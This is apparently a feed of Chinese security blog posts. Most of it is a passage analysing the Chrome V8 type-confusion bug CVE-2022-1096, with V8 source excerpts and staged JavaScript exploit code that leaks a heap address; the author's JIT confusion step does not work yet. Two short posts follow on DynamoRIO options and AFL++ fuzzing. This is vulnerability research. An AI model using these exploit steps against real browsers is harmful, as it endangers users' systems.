  <span class="n">TransitionsAccessor</span> <span class="n">transitions</span><span class="p">(</span><span class="n">isolate</span><span class="p">,</span> <span class="o">*</span><span class="k">this</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">no_gc</span><span class="p">);</span>
  <span class="kt">int</span> <span class="n">num_transitions</span> <span class="o">=</span> <span class="n">transitions</span><span class="p">.</span><span class="n">NumberOfTransitions</span><span class="p">();</span>
  <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">num_transitions</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">transitions</span><span class="p">.</span><span class="n">GetTarget</span><span class="p">(</span><span class="n">i</span><span class="p">).</span><span class="n">DeprecateTransitionTree</span><span class="p">(</span><span class="n">isolate</span><span class="p">);</span>
  <span class="p">}</span>
  <span class="n">DCHECK</span><span class="p">(</span><span class="o">!</span><span class="n">constructor_or_back_pointer</span><span class="p">().</span><span class="n">IsFunctionTemplateInfo</span><span class="p">());</span>
  <span class="n">DCHECK</span><span class="p">(</span><span class="n">CanBeDeprecated</span><span class="p">());</span>
  <span class="n">set_is_deprecated</span><span class="p">(</span><span class="nb">true</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">FLAG_log_maps</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">LOG</span><span class="p">(</span><span class="n">isolate</span><span class="p">,</span> <span class="n">MapEvent</span><span class="p">(</span><span class="s">"Deprecate"</span><span class="p">,</span> <span class="n">handle</span><span class="p">(</span><span class="o">*</span><span class="k">this</span><span class="p">,</span> <span class="n">isolate</span><span class="p">),</span> <span class="n">Handle</span><span class="o">&lt;</span><span class="n">Map</span><span class="o">&gt;</span><span class="p">()));</span>
  <span class="p">}</span>
  <span class="n">dependent_code</span><span class="p">().</span><span class="n">DeoptimizeDependentCodeGroup</span><span class="p">(</span>
      <span class="n">isolate</span><span class="p">,</span> <span class="n">DependentCode</span><span class="o">::</span><span class="n">kTransitionGroup</span><span class="p">);</span>
  <span class="n">NotifyLeafMapLayoutChange</span><span class="p">(</span><span class="n">isolate</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>具体操作是在 s2 的两次 prop 属性设置之间，通过给 s1 的 prop 属性赋值的方式，修改 s1 的 prop 属性的类型。这样 s1 的旧 map 会被标记为 deptecate，因为 s1 和 s2 是共享同一个 map 的，s2 当前使用的 map 就变成 deprecate 的了，等 s2 的第二次 prop 赋值时，由于 map 被打上了 deprecated 标记，就走入了非 simple_transition 的代码路径。</p>

<p>利用代码如下：</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">s2</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">p</span><span class="dl">'</span><span class="p">).</span><span class="nx">style</span><span class="p">;</span>
<span class="nx">v2</span> <span class="o">=</span> <span class="p">{</span> <span class="na">toString</span><span class="p">:</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span><span class="nx">s2</span><span class="p">.</span><span class="nx">prop</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="nx">s1</span><span class="p">.</span><span class="nx">prop</span> <span class="o">=</span> <span class="mf">1.1</span><span class="p">;</span> <span class="p">};</span>
<span class="nx">s2</span><span class="p">.</span><span class="nx">prop</span> <span class="o">=</span> <span class="nx">v2</span><span class="p">;</span>
</code></pre></div></div>

<hr />
<p>⚠️ 提示：不清楚 s1 和 s2 为什么共享同一个 map 的同学，可以去了解一下 v8 中 map transition 的相关内容，我在 <a href="/2022/04/30/CVE-2021-30551.html">CVE-2021-30551 分析</a> 这篇的”分析 map 的变化过程”这一小节也有简单介绍。</p>

<hr />

<p>在属性访问的时候也是用同一个线性搜索算法，所以之后访问对象的 prop 属性，实际访问的都是存储在第一个 prop 属性处的值，对于 s1 来说是第一次 WriteToField 写入的，对于 s2 来说是第二次。</p>

<p>分析 JSObject::WriteToField 代码，结合上 CVE-2021-30551 的利用经验，可以很容易想到，如果把 v2 改成一个数组的话，就可以直接通过 s2.prop 读取到数组的 Elements。</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">s2</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">p</span><span class="dl">'</span><span class="p">).</span><span class="nx">style</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">v2</span> <span class="o">=</span> <span class="p">[</span><span class="mf">1.1</span><span class="p">,</span> <span class="mf">1.2</span><span class="p">,</span> <span class="mf">1.3</span><span class="p">];</span>
<span class="nx">v2</span><span class="p">.</span><span class="nx">toString</span> <span class="o">=</span>  <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span>
	<span class="nx">s2</span><span class="p">.</span><span class="nx">prop</span> <span class="o">=</span> <span class="mi">1</span>
	<span class="nx">s1</span><span class="p">.</span><span class="nx">prop</span> <span class="o">=</span> <span class="mf">1.1</span>
<span class="p">};</span>
<span class="nx">s2</span><span class="p">.</span><span class="nx">prop</span> <span class="o">=</span> <span class="nx">v2</span><span class="p">;</span>
</code></pre></div></div>

<p>实际验证下效果，验证过程中还要用到一些浮点数和大整数之间的类型转换，我这次把它封装成了模块 conversion.mjs，方便以后复用。</p>

<p>完整代码如下：</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// conversion.mjs</span>
<span class="kd">var</span> <span class="nx">buf</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">ArrayBuffer</span><span class="p">(</span><span class="mi">8</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">f64</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Float64Array</span><span class="p">(</span><span class="nx">buf</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">u64</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">BigUint64Array</span><span class="p">(</span><span class="nx">buf</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">u32</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Uint32Array</span><span class="p">(</span><span class="nx">buf</span><span class="p">);</span>

<span class="kd">function</span> <span class="nx">ftou</span><span class="p">(</span><span class="nx">f</span><span class="p">)</span> <span class="p">{</span>
	<span class="nx">f64</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="nx">f</span><span class="p">;</span>
	<span class="k">return</span> <span class="nx">u64</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="p">}</span>

<span class="kd">function</span> <span class="nx">utof</span><span class="p">(</span><span class="nx">u</span><span class="p">)</span> <span class="p">{</span>
	<span class="nx">u64</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="nx">u</span><span class="p">;</span>
	<span class="k">return</span> <span class="nx">f64</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="p">}</span>

<span class="kd">function</span> <span class="nx">low32</span><span class="p">(</span><span class="nx">u</span><span class="p">)</span> <span class="p">{</span>
	<span class="nx">u64</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="nx">u</span><span class="p">;</span>
	<span class="k">return</span> <span class="nx">u32</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="p">}</span>

<span class="kd">function</span> <span class="nx">high32</span><span class="p">(</span><span class="nx">u</span><span class="p">)</span> <span class="p">{</span>
	<span class="nx">u64</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="nx">u</span><span class="p">;</span>
	<span class="k">return</span> <span class="nx">u32</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
<span class="p">}</span>

<span class="k">export</span> <span class="p">{</span><span class="nx">ftou</span><span class="p">,</span> <span class="nx">utof</span><span class="p">,</span> <span class="nx">low32</span><span class="p">,</span> <span class="nx">high32</span><span class="p">};</span>
</code></pre></div></div>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// main.js</span>
<span class="k">import</span> <span class="o">*</span> <span class="k">as</span> <span class="nx">cvs</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">./module/conversion.mjs</span><span class="dl">'</span>

<span class="kd">var</span> <span class="nx">s1</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">p</span><span class="dl">'</span><span class="p">).</span><span class="nx">style</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">v1</span> <span class="o">=</span> <span class="p">{</span> <span class="na">toString</span><span class="p">:</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span><span class="nx">s1</span><span class="p">.</span><span class="nx">prop</span> <span class="o">=</span> <span class="mi">1</span><span class="p">}</span> <span class="p">};</span>
<span class="nx">s1</span><span class="p">.</span><span class="nx">prop</span> <span class="o">=</span> <span class="nx">v1</span><span class="p">;</span>


<span class="kd">var</span> <span class="nx">s2</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">p</span><span class="dl">'</span><span class="p">).</span><span class="nx">style</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">v2</span> <span class="o">=</span> <span class="p">[</span><span class="mf">1.1</span><span class="p">,</span> <span class="mf">1.2</span><span class="p">,</span> <span class="mf">1.3</span><span class="p">];</span>
<span class="nx">v2</span><span class="p">.</span><span class="nx">toString</span> <span class="o">=</span>  <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span>
	<span class="nx">s2</span><span class="p">.</span><span class="nx">prop</span> <span class="o">=</span> <span class="mi">1</span>
	<span class="nx">s1</span><span class="p">.</span><span class="nx">prop</span> <span class="o">=</span> <span class="mf">1.1</span>
<span class="p">};</span>

<span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="nx">s2</span><span class="p">.</span><span class="nx">prop</span> <span class="o">=</span> <span class="nx">v2</span><span class="p">;</span>

<span class="nx">alert</span><span class="p">(</span><span class="s2">`0x</span><span class="p">${</span><span class="nx">cvs</span><span class="p">.</span><span class="nx">ftou</span><span class="p">(</span><span class="nx">s2</span><span class="p">.</span><span class="nx">prop</span><span class="p">).</span><span class="nx">toString</span><span class="p">(</span><span class="mi">16</span><span class="p">)}</span><span class="s2">`</span><span class="p">);</span>
</code></pre></div></div>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">&lt;!--exp.html--&gt;</span>
<span class="nt">&lt;html&gt;</span>
	<span class="nt">&lt;body&gt;</span>
		<span class="nt">&lt;script </span><span class="na">type=</span><span class="s">"module"</span> <span class="na">src=</span><span class="s">"./main.js"</span><span class="nt">&gt;</span>
		<span class="nt">&lt;/script&gt;</span>
		PWN:)
	<span class="nt">&lt;/body&gt;</span>
<span class="nt">&lt;/html&gt;</span>
</code></pre></div></div>

<hr />
<p>⚠️提示：浏览器原生支持的模块的用法参考 <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Modules">MDN</a>，也可以用Typescript，Babel 提供的模块机制。</p>

<hr />
<p>如下图所示，读取到的结果和调试器中看到的 v2 的内容一致。</p>

<p>![[Pasted image 20221205000128.png]]</p>

<p>光能泄漏一个数组 Elements 的地址还是不够的，还需要进一步的转化获得一个修改什么数据的能力。先借鉴 CVE-2021-30551 POC 中的思路，优化一下上面的利用代码，引入一个新的属性 deprecate 来专门触发 map 废弃，这样 prop 就可以支持更多的数据类型之间的混淆了，代码修改如下：</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// main.js</span>
<span class="k">import</span> <span class="o">*</span> <span class="k">as</span> <span class="nx">cvs</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">./module/conversion.mjs</span><span class="dl">'</span>                  

<span class="kd">const</span> <span class="nx">smi_value</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>                                            
<span class="kd">const</span> <span class="nx">double_value</span> <span class="o">=</span> <span class="mf">1.1</span><span class="p">;</span>                                       

<span class="kd">var</span> <span class="nx">s1</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">p</span><span class="dl">'</span><span class="p">).</span><span class="nx">style</span><span class="p">;</span>                     
<span class="kd">var</span> <span class="nx">v1</span> <span class="o">=</span> <span class="p">{</span>                                                      
	<span class="na">toString</span><span class="p">:</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span>
		<span class="c1">// 2. 创建一个包含 double(HeapNumber) 类型的 confuzion 属性的新 map                                             </span>
		<span class="nx">s1</span><span class="p">.</span><span class="nx">confuzion</span> <span class="o">=</span> <span class="nx">double_value</span><span class="p">;</span>                                
	<span class="p">}</span>                                                             
<span class="p">};</span>                                                              

<span class="c1">// 1. 创建一个包含 SMI类型的 deprecate 属性的新 map </span>
<span class="nx">s1</span><span class="p">.</span><span class="nx">deprecate</span> <span class="o">=</span> <span class="nx">smi_value</span><span class="p">;</span>                    
<span class="c1">// 3. 创建一个包含 object 类型的 confuzion 属性的新 map</span>
<span class="nx">s1</span><span class="p">.</span><span class="nx">confuzion</span> <span class="o">=</span> <span class="nx">v1</span><span class="p">;</span>                                              

<span class="kd">var</span> <span class="nx">s2</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">p</span><span class="dl">'</span><span class="p">).</span><span class="nx">style</span><span class="p">;</span>                     
<span class="kd">var</span> <span class="nx">v2</span> <span class="o">=</span> <span class="p">[</span><span class="mf">1.1</span><span class="p">,</span> <span class="mf">1.2</span><span class="p">,</span> <span class="mf">1.3</span><span class="p">];</span>                                       
<span class="nx">v2</span><span class="p">.</span><span class="nx">toString</span> <span class="o">=</span>  <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span>      
	<span class="c1">// 5. 搜索到 2 中创建好的 map</span>
	<span class="nx">s2</span><span class="p">.</span><span class="nx">confuzion</span> <span class="o">=</span> <span class="nx">double_value</span><span class="p">;</span>
	<span class="c1">// 6. deprecate 属性的类型从 SMI 泛化到了 HeapNumber，创建新 map 替代 </span>
	<span class="c1">// 1. 2. 3. 创建的 map，并且把旧 map 被标记为 deprecate                                  </span>
	<span class="nx">s1</span><span class="p">.</span><span class="nx">deprecate</span> <span class="o">=</span> <span class="nx">double_value</span><span class="p">;</span>                                  
<span class="p">};</span>                                                              

<span class="c1">// 4.搜索到 1. 中创建好的 map</span>
<span class="nx">s2</span><span class="p">.</span><span class="nx">deprecate</span> <span class="o">=</span> <span class="nx">smi_value</span><span class="p">;</span>     
<span class="c1">// 7. 发现 s2 目前的 map 已经被标记为 deprecated，先更新到 6. 中创建的新 map，然后又以 </span>
<span class="c1">// confuzion 属性名，搜索新 map，还是搜索到 6. 中创建的新 map，也是 s1 目前在用的 map</span>
<span class="nx">s2</span><span class="p">.</span><span class="nx">confuzion</span> <span class="o">=</span> <span class="nx">v2</span><span class="p">;</span>                                              

<span class="nx">alert</span><span class="p">(</span><span class="s2">`0x</span><span class="p">${</span><span class="nx">cvs</span><span class="p">.</span><span class="nx">ftou</span><span class="p">(</span><span class="nx">s2</span><span class="p">.</span><span class="nx">confuzion</span><span class="p">).</span><span class="nx">toString</span><span class="p">(</span><span class="mi">16</span><span class="p">)}</span><span class="s2">`</span><span class="p">);</span>              
</code></pre></div></div>

<p>再来分析一下目前都可以控制哪些东西，s1.confuzion 的类型是完全可控的，s2.confuzion 我认为是不太可控的，为了触发漏洞 s2.confuzion 一定要是个包含 toString 函数的对象，这意味着它一定要是 HeapObject 类型的。</p>

<hr />
<p>⚠️ 提示：这块只是我自己的理解，不一定对，也许有什么我不知道的特性让非 HeapObject 类型的值也可以有自定义的 toString 回调。</p>

<hr />

<p>之前分析过 CVE-2021-30551 的思路是，让 s2.confuzion 是一个浮点数，s1.confuzion 是一个数组，就可以把写入 s2.confuzion 的浮点数，当作数组的地址使用。但这个漏洞 s2.confuzion 一定要是 HeapObject，我就想到是不是可以选择浮点数数组，然后让 s1.confuzion 是对象数组。回顾一下上面的 WriteField 函数，对象的写入由 FastPropertyAtPut 函数完成，就是把对象的指针存储到属性中，这个赋值操作并不能直接触发类型混淆，需要结合上 JIT 编译生成的代码才行。</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="n">JSObject</span><span class="o">::</span><span class="n">FastPropertyAtPut</span><span class="p">(</span><span class="n">FieldIndex</span> <span class="n">index</span><span class="p">,</span> <span class="n">Object</span> <span class="n">value</span><span class="p">,</span>
                                 <span class="n">WriteBarrierMode</span> <span class="n">mode</span><span class="p">)</span> <span class="p">{</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">index</span><span class="p">.</span><span class="n">is_inobject</span><span class="p">())</span> <span class="p">{</span>
    <span class="n">RawFastInobjectPropertyAtPut</span><span class="p">(</span><span class="n">index</span><span class="p">,</span> <span class="n">value</span><span class="p">,</span> <span class="n">mode</span><span class="p">);</span>
  <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
    <span class="n">DCHECK_EQ</span><span class="p">(</span><span class="n">UPDATE_WRITE_BARRIER</span><span class="p">,</span> <span class="n">mode</span><span class="p">);</span>
    <span class="n">property_array</span><span class="p">().</span><span class="n">set</span><span class="p">(</span><span class="n">index</span><span class="p">.</span><span class="n">outobject_array_index</span><span class="p">(),</span> <span class="n">value</span><span class="p">);</span>
  <span class="p">}</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="n">JSObject</span><span class="o">::</span><span class="n">RawFastInobjectPropertyAtPut</span><span class="p">(</span><span class="n">FieldIndex</span> <span class="n">index</span><span class="p">,</span> <span class="n">Object</span> <span class="n">value</span><span class="p">,</span>
                                            <span class="n">WriteBarrierMode</span> <span class="n">mode</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">DCHECK</span><span class="p">(</span><span class="n">index</span><span class="p">.</span><span class="n">is_inobject</span><span class="p">());</span>
  <span class="kt">int</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">index</span><span class="p">.</span><span class="n">offset</span><span class="p">();</span>
  <span class="n">RELAXED_WRITE_FIELD</span><span class="p">(</span><span class="o">*</span><span class="k">this</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="n">value</span><span class="p">);</span>
  <span class="n">CONDITIONAL_WRITE_BARRIER</span><span class="p">(</span><span class="o">*</span><span class="k">this</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="n">value</span><span class="p">,</span> <span class="n">mode</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>基本思路是定义一个读取参数对象的 confusion[0] 的函数，然后用 s1 触发这个函数的 JIT 编译，之后以 s2 为参数调用 JIT 编译好的函数，如果没有触发 deoptimize 的话，s2.confusion 就会被当作对象数组使用，而实际上它是一个浮点数数组，数组里存储的内容都是可控的。</p>

<p>先用下面的代码测试下：</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">import</span> <span class="o">*</span> <span class="k">as</span> <span class="nx">cvs</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">./module/conversion.mjs</span><span class="dl">'</span>

<span class="kd">const</span> <span class="nx">smi_value</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">double_value</span> <span class="o">=</span> <span class="mf">1.1</span><span class="p">;</span>

<span class="kd">const</span> <span class="nx">obj_arr</span> <span class="o">=</span> <span class="p">[{},</span> <span class="p">{},</span> <span class="p">{}];</span>

<span class="kd">var</span> <span class="nx">s1</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">p</span><span class="dl">'</span><span class="p">).</span><span class="nx">style</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">v1</span> <span class="o">=</span> <span class="p">{</span>
	<span class="na">toString</span><span class="p">:</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span>
		<span class="nx">s1</span><span class="p">.</span><span class="nx">confuzion</span> <span class="o">=</span> <span class="nx">obj_arr</span><span class="p">;</span>
	<span class="p">}</span>
<span class="p">};</span>

<span class="nx">s1</span><span class="p">.</span><span class="nx">deprecate</span> <span class="o">=</span> <span class="nx">smi_value</span><span class="p">;</span>
<span class="nx">s1</span><span class="p">.</span><span class="nx">confuzion</span> <span class="o">=</span> <span class="nx">v1</span><span class="p">;</span>

<span class="kd">var</span> <span class="nx">s2</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">p</span><span class="dl">'</span><span class="p">).</span><span class="nx">style</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">v2</span> <span class="o">=</span> <span class="p">[</span><span class="mf">1.1</span><span class="p">,</span> <span class="mf">1.2</span><span class="p">,</span> <span class="mf">1.3</span><span class="p">];</span>
<span class="nx">v2</span><span class="p">.</span><span class="nx">toString</span> <span class="o">=</span>  <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span>
	<span class="nx">s2</span><span class="p">.</span><span class="nx">confuzion</span> <span class="o">=</span> <span class="nx">obj_arr</span><span class="p">;</span>
	<span class="nx">s1</span><span class="p">.</span><span class="nx">deprecate</span> <span class="o">=</span> <span class="nx">double_value</span><span class="p">;</span>
<span class="p">};</span>

<span class="nx">s2</span><span class="p">.</span><span class="nx">deprecate</span> <span class="o">=</span> <span class="nx">smi_value</span><span class="p">;</span>
<span class="nx">s2</span><span class="p">.</span><span class="nx">confuzion</span> <span class="o">=</span> <span class="nx">v2</span><span class="p">;</span>

<span class="kd">var</span> <span class="nx">jit</span> <span class="o">=</span> <span class="p">(</span><span class="nx">obj</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span>
	<span class="k">return</span> <span class="nx">obj</span><span class="p">.</span><span class="nx">confuzion</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="p">}</span>

<span class="k">for</span><span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="mi">20000</span><span class="p">;</span> <span class="o">++</span><span class="nx">i</span><span class="p">)</span> <span class="p">{</span>
	<span class="nx">jit</span><span class="p">(</span><span class="nx">s1</span><span class="p">);</span>
<span class="p">}</span>

<span class="nx">alert</span><span class="p">(</span><span class="nx">jit</span><span class="p">(</span><span class="nx">s2</span><span class="p">));</span>
</code></pre></div></div>

<p>不出意外的结果是不行，alert 弹窗输出了正确的浮点值 1.1，下面我分析一下为什么不行。我对 turbofan 的整个编译过程虽然不是一无所知吧，但是可以说是一窍不通。所以我采用的分析方案就是抓取 trace log 和 CVE-2021-30551 的进行对比，找到它们的区别。</p>

<p>抓取 trace log 需要指定命令行 <code class="language-plaintext highlighter-rouge">./chrome.exe --no-sandbox --enable-logging=stderr --js-flags="--trace-turbo"</code>。</p>

<p>简单对比之后我发现，主要的区别在 V8.TFInlining 阶段。jit 函数很简单，访问对象的属性 confuzion 以及访问数组的 [0] 元素两个操作，分别对应 IR 图中的 JSLoadNamed 和 JSLoadProperty 两个节点。对于 CVE-2021-30551 的 EXP，这两个节点在 V8.TFInlining 阶段满足了优化的条件，都被替换成了更底层的内存加载操作 LoadFiled、LoadElement。而对于本次的 EXP JSLoadNamed 节点没有满足优化条件，仍然保持是 JSLoadNamed，这个区别就使得直接导致类型混淆的 CheckMaps 优化的条件没有被满足，编译生成的代码在访问 confuzion[0] 还是会检查 confuzion 的 map 是否满足条件，不会触发类型混淆。</p>

<p>![[Pasted image 20221213233338.png]]</p>

<p>![[Pasted image 20221213233416.png]]</p>

<hr />
<p>⚠️ 提示：如果不理解这里，需要回忆一下 CVE-2021-30551 的 利用过程，有关键的一步是 JSLoadNamed 和 JSLoadElements 两个节点 Inline 后得到的两个 ChecksMaps 被优化编译器认为是重复的，第二个在优化过程中被删掉了。如果第二个 CheckMaps 一直保留的话，程序运行过程中，就能正确的识别出 obj.confuzion 的类型与预期不匹配，走入 deoptimize 的流程，避免类型混淆的发生。详情可以参考<a href="2022-04-30-CVE-2021-30551">我之前对 CVE-2021-30551 的分析</a>。</p>

<hr />]]></content><author><name></name></author><summary type="html"><![CDATA[CVE-2022-1096 是 CVE-2021-30551 的变种。]]></summary></entry><entry><title type="html">DynamoRIO 常用参数</title><link href="https://pwntips.github.io/2022/07/20/dynamo-rio-options.html" rel="alternate" type="text/html" title="DynamoRIO 常用参数" /><published>2022-07-20T00:00:00+08:00</published><updated>2022-07-20T00:00:00+08:00</updated><id>https://pwntips.github.io/2022/07/20/dynamo-rio-options</id><content type="html" xml:base="https://pwntips.github.io/2022/07/20/dynamo-rio-options.html"><![CDATA[<p>很多 Fuzzing 相关的工具，诸如 winAFL、lighthouse 都涉及到 DynamoRIO 的使用，记录一些常用的 DynamoRIO 参数便于解决在使用这些工具时遇到的问题。</p>

<p>drrun 的参数</p>
<ul>
  <li>-no_follow_children: 
  默认情况下 DynamoRIO 会插装目标整个进程树，很多时候这并不是我们希望的动作，指定此参数后仅插装目标进程，忽略子进程。
  还可以指定仅插装指定的子进程</li>
  <li>-msgbox_mask _0xN：
  在指定事件发生时弹出消息窗，一般用在调试过程中。
  例如：发现目标进程运行一会就会崩溃，可以指定 -msgbox_mask 15, 这样目标进程启动后会弹出一个消息框，便于我们附加到目标进程上。</li>
  <li>更参数见 <a href="https://dynamorio.org/page_deploy.html#sec_options">DynamoRIO Runtime Options</a> 部分</li>
</ul>]]></content><author><name></name></author><summary type="html"><![CDATA[很多 Fuzzing 相关的工具，诸如 winAFL、lighthouse 都涉及到 DynamoRIO 的使用，记录一些常用的 DynamoRIO 参数便于解决在使用这些工具时遇到的问题。]]></summary></entry><entry><title type="html">学习使用 AFL++</title><link href="https://pwntips.github.io/2022/07/19/afl-plus-plus-usage.html" rel="alternate" type="text/html" title="学习使用 AFL++" /><published>2022-07-19T00:00:00+08:00</published><updated>2022-07-19T00:00:00+08:00</updated><id>https://pwntips.github.io/2022/07/19/afl-plus-plus-usage</id><content type="html" xml:base="https://pwntips.github.io/2022/07/19/afl-plus-plus-usage.html"><![CDATA[<p>目前热度最高的漏洞挖掘方法应该就是 Fuzzing 了，本文记录我学习使用 AFL++ 来 Fuzzing 开源的音频文件标签处理库 <a href="https://taglib.org/">taglib</a> 的过程。</p>

<h2 id="构建-afl">构建 AFL++</h2>

<p>参考<a href="https://github.com/AFLplusplus/AFLplusplus/blob/stable/docs/INSTALL.md">官方文档</a>即可，同时要注意：</p>
<ul>
  <li>AFL++ 支持的功能很丰富，考虑到大部分人不会用到所有功能，构建也是提供了不同的可选集合的，比如我只需要 llvm 的 instrumentation，就用 <code class="language-plaintext highlighter-rouge">make all</code> 即可，文档里已经描述的很清楚了。</li>
  <li>如果需要 <code class="language-plaintext highlighter-rouge">llvm/gcc</code> 以外的一些功能，构建过程中可能从 github/google 服务器拉取依赖代码，推荐挂好梯子</li>
  <li>先装好依赖确认 llvm-config/LLVM_CONFIG 可以正常使用后再去构建 AFL++，否则可能出现虽然构建成功了，但较新的 llvm 功能没有被构建到程序中的情况。</li>
  <li>构建完成后，运行 <code class="language-plaintext highlighter-rouge">make install</code>，将 afl++ 安装到 /usr/local/bin 目录</li>
</ul>

<h2 id="构建-harness">构建 harness</h2>

<p>harness 是被 fuzzing 的程序，它会被 fuzzer 运行，负责执行待 fuzzing 的代码，同时采集代码覆盖信息反馈给 fuzzer。</p>

<p>对于 taglib 来说，examples 目录下提供的 tagreader 程序，可以打开通过参数指定的音频文件，列出文件中包含的 tag，就可以直接作为 harmess 来使用。不过 fuzzing 过程中，会重复的打开文件，修改文件，如果每次打开一个文件都要重启程序，执行效率不高，我按照<a href="https://github.com/AFLplusplus/AFLplusplus/blob/stable/instrumentation/README.persistent_mode.md">官方文档 persist_mode </a> 中提到的方法，对 tagreader.cpp 稍加修改，把它改成了启动后可以持续解析同一个文件的程序，这样省下了很多进程初始化的时间，提升了 fuzzing 效率。</p>

<p>其实还可以进一步优化，采用内存映射的方式读取数据，这样映射一次后，数据就驻留在内存（数据总量很大时也可能是交换文件）中了，省去读取文件的时间。</p>

<p>这里我先尝试用标版的 clang 构建出未修改的 tagreader，成功后再用 afl++ 的 llvm lto 模式构建了 perisst_mode 的 tagreader。这部分的构建官方文档我怀疑有部分内容过时了，对于 taglib 来说 lto 模式构建也很简单，如下操作即可：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ cd taglib
$ cmake -DCMAKE_C_COMPILER=afl-cc -DCMAKE_CXX_COMPILER=afl-c++ -DBUILD_EXAMPLES=ON -DCMAKE_INSTALL_PREFIX=/usr/local -DCMAKE_BUILD_TYPE=Release .
$ export AFL_CC_COMPILE=LTO
$ make
</code></pre></div></div>

<p>cmake 的参数：</p>
<ul>
  <li>-DCMAKE_C_COMPILER=afl-cc -DCMAKE_CXX_COMPILER=afl-c++ 把 afl-cc/afl-c++ 作为编译工具，这个程序会从环境变量读取相关配置，用合适的参数调用真正的编译工具</li>
  <li>剩下的部分是 taglib 的参数，参考 <a href="https://github.com/taglib/taglib/blob/master/INSTALL.md">taglib 文档</a></li>
</ul>

